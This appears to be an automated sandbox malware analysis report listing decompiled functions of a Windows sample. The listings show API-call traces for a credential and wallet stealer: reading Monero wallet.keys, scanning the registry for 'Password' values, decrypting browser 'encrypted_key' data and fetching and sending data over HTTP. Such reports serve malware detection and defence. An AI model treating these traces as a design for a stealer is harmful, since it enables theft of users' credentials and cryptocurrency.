                        • Part of subcall function 00736280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
                        • Part of subcall function 00736280: HttpOpenRequestA.WININET(00000000,GET,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00736385
                        • Part of subcall function 00736280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
                        • Part of subcall function 00736280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745318
                      • lstrlen.KERNEL32(00000000), ref: 0074532F
                        • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00745364
                      • lstrlen.KERNEL32(00000000), ref: 00745383
                      • lstrlen.KERNEL32(00000000), ref: 007453AE
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 94675b90fd7d24f8676e185602f688a810290b7246d5f51f6e4f439b3d2e53e9
                      • Instruction ID: dd296fec91e1f24f45d988f8cfb7f25cce4dc3c0d7e6222b9f506404861525cd
                      • Opcode Fuzzy Hash: 94675b90fd7d24f8676e185602f688a810290b7246d5f51f6e4f439b3d2e53e9
                      • Instruction Fuzzy Hash: 4B513F70954148EBEB18FF60CD9AAED7779EF50305F504028F80A5B592EF386B46CB62
                      Function 007412D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: d6dab0d00ffffe4add4ace1a872da3d79611c5e832a1184f6096c799ef49191f
                      • Instruction ID: fb9014bd8093a1c5547f47cf8d0457da2f91b204292197e285c9156940eab460
                      • Opcode Fuzzy Hash: d6dab0d00ffffe4add4ace1a872da3d79611c5e832a1184f6096c799ef49191f
                      • Instruction Fuzzy Hash: 48C183B694021DEBCB14EF60DC89FEE7378BB54304F004599E50AA7241EB78AA85DF91
                      Function 00744280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00748E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 007442EC
                      • lstrcat.KERNEL32(?,013ED838), ref: 0074430B
                      • lstrcat.KERNEL32(?,?), ref: 0074431F
                      • lstrcat.KERNEL32(?,013ECF00), ref: 00744333
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 00748D90: GetFileAttributesA.KERNEL32(00000000,?,00731B54,?,?,0075564C,?,?,00750E1F), ref: 00748D9F
                        • Part of subcall function 00739CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00739D39
                        • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                        • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                        • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                        • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,0073148F,00000000), ref: 00739A5A
                        • Part of subcall function 007399C0: LocalFree.KERNEL32(0073148F), ref: 00739A90
                        • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                        • Part of subcall function 007493C0: GlobalAlloc.KERNEL32(00000000,007443DD,007443DD), ref: 007493D3
                      • StrStrA.SHLWAPI(?,013ED868), ref: 007443F3
                      • GlobalFree.KERNEL32(?), ref: 00744512
                        • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF
                        • Part of subcall function 00739AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
                        • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A
                        • Part of subcall function 00739AC0: LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 007444A3
                      • StrCmpCA.SHLWAPI(?,007508D1), ref: 007444C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 007444D2
                      • lstrcat.KERNEL32(00000000,?), ref: 007444E5
                      • lstrcat.KERNEL32(00000000,00750FB8), ref: 007444F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: 33a14ffd374667d3b64afe51a26f04520ff57841fea444af9ed2839772240779
                      • Instruction ID: dacc34e96d0a349c72a35d7cb03203978e6ec6cda906788d79c6d898122d47f8
                      • Opcode Fuzzy Hash: 33a14ffd374667d3b64afe51a26f04520ff57841fea444af9ed2839772240779
                      • Instruction Fuzzy Hash: 6E7116B6910208B7DB14EBA0DC89FEE7379AB88300F044598F61997181EB78DB55DF92
                      Function 00731310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 007312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007312B4
                        • Part of subcall function 007312A0: RtlAllocateHeap.NTDLL(00000000), ref: 007312BB
                        • Part of subcall function 007312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007312D7
                        • Part of subcall function 007312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007312F5
                        • Part of subcall function 007312A0: RegCloseKey.ADVAPI32(?), ref: 007312FF
                      • lstrcat.KERNEL32(?,00000000), ref: 0073134F
                      • lstrlen.KERNEL32(?), ref: 0073135C
                      • lstrcat.KERNEL32(?,.keys), ref: 00731377
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 00748B60: GetSystemTime.KERNEL32(00750E1A,013E9998,007505AE,?,?,007313F9,?,0000001A,00750E1A,00000000,?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 00748B86
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00731465
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                        • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                        • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                        • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,0073148F,00000000), ref: 00739A5A
                        • Part of subcall function 007399C0: LocalFree.KERNEL32(0073148F), ref: 00739A90
                        • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 007314EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: 332aa866e70fc07d91bdb73de64a8a091aa31c5f022f0addd015b482f9ac0536
                      • Instruction ID: e12391d379c9d2a864c9cfd14425ec0cf153d431c687df7a670141304b60b27c
                      • Opcode Fuzzy Hash: 332aa866e70fc07d91bdb73de64a8a091aa31c5f022f0addd015b482f9ac0536
                      • Instruction Fuzzy Hash: 2D5147B2D50118E7D715FB60DD96BED737CAF54300F4041A8B60A62082EF786B89CF96
                      Function 007375D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 007372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0073733A
                        • Part of subcall function 007372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007373B1
                        • Part of subcall function 007372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0073740D
                        • Part of subcall function 007372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00737452
                        • Part of subcall function 007372D0: HeapFree.KERNEL32(00000000), ref: 00737459
                      • lstrcat.KERNEL32(00000000,007517FC), ref: 00737606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00737648
                      • lstrcat.KERNEL32(00000000, : ), ref: 0073765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 0073768F
                      • lstrcat.KERNEL32(00000000,00751804), ref: 007376A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 007376D3
                      • lstrcat.KERNEL32(00000000,00751808), ref: 007376ED
                      • task.LIBCPMTD ref: 007376FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                      • String ID: :
                      • API String ID: 2677904052-3653984579
                      • Opcode ID: 1321b6896859b4ee40a8b49835bc63d475fb60a796ed0d566e822c3546786618
                      • Instruction ID: 637ca05db81282946b3971db024c605b7d7ba86613af63d1a23dccc948e077f6
                      • Opcode Fuzzy Hash: 1321b6896859b4ee40a8b49835bc63d475fb60a796ed0d566e822c3546786618
                      • Instruction Fuzzy Hash: 273170B2914109DFDB48EBE4DC9ADFF7374BB84302F144018F116A7251DA38A986DB52
                      Function 00748100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013EDEC8,00000000,?,00750E2C,00000000,?,00000000), ref: 00748130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00748137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00748158
                      • __aulldiv.LIBCMT ref: 00748172
                      • __aulldiv.LIBCMT ref: 00748180
                      • wsprintfA.USER32 ref: 007481AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@
                      • API String ID: 2774356765-3474575989
                      • Opcode ID: 8397b54f5e2d8f7cc9186925a1df9ad278d0ee4f5591a153642f03eb260803f5
                      • Instruction ID: 3509db1c7e13dfd780d87c3c59208bba0ac6c8abc4867e49412fb4d2646d1f79
                      • Opcode Fuzzy Hash: 8397b54f5e2d8f7cc9186925a1df9ad278d0ee4f5591a153642f03eb260803f5
                      • Instruction Fuzzy Hash: 7A211AB1E44218ABDB10DFD4CC49FAEB7B8FB44B14F104609F605BB280D77869018BA6
                      Function 007360A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                        • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                      • InternetOpenA.WININET(00750DF7,00000001,00000000,00000000,00000000), ref: 0073610F
                      • StrCmpCA.SHLWAPI(?,013EE290), ref: 00736147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0073618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007361B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 007361DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0073620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00736249
                      • InternetCloseHandle.WININET(?), ref: 00736253
                      • InternetCloseHandle.WININET(00000000), ref: 00736260
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID:
                      • API String ID: 2507841554-0
                      • Opcode ID: 909bf25463437ffa053e050e5caa728b0fd3607eb6db739fd05c81aeae612118
                      • Instruction ID: 85ad3be9c392f88d4da6c8dd92508b3871669b0763efbe09a505d7084bdc784c
                      • Opcode Fuzzy Hash: 909bf25463437ffa053e050e5caa728b0fd3607eb6db739fd05c81aeae612118
                      • Instruction Fuzzy Hash: 36516FB1A40208FBEB24DF50DC49BEE77B8FB44705F108098A609A71C1DB796A85CF95
                      Function 007372D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0073733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007373B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0073740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00737452
                      • HeapFree.KERNEL32(00000000), ref: 00737459
                      • task.LIBCPMTD ref: 00737555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuetask
                      • String ID: Password
                      • API String ID: 775622407-3434357891
                      • Opcode ID: 78f2b975e6e122be2878af10774dea33ccfa056cc1ed5b12383eb6a797cad7a9
                      • Instruction ID: 79868b0275d27ace5d0040a7ee3a94b14abcd6a36884db3dc826abf0bbebf4a1
                      • Opcode Fuzzy Hash: 78f2b975e6e122be2878af10774dea33ccfa056cc1ed5b12383eb6a797cad7a9
                      • Instruction Fuzzy Hash: 3A6110B591426CDBDB24DB50CD45BDA77B8BF44300F0081D9E68966142DBB46FC9CF91
                      Function 0073BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
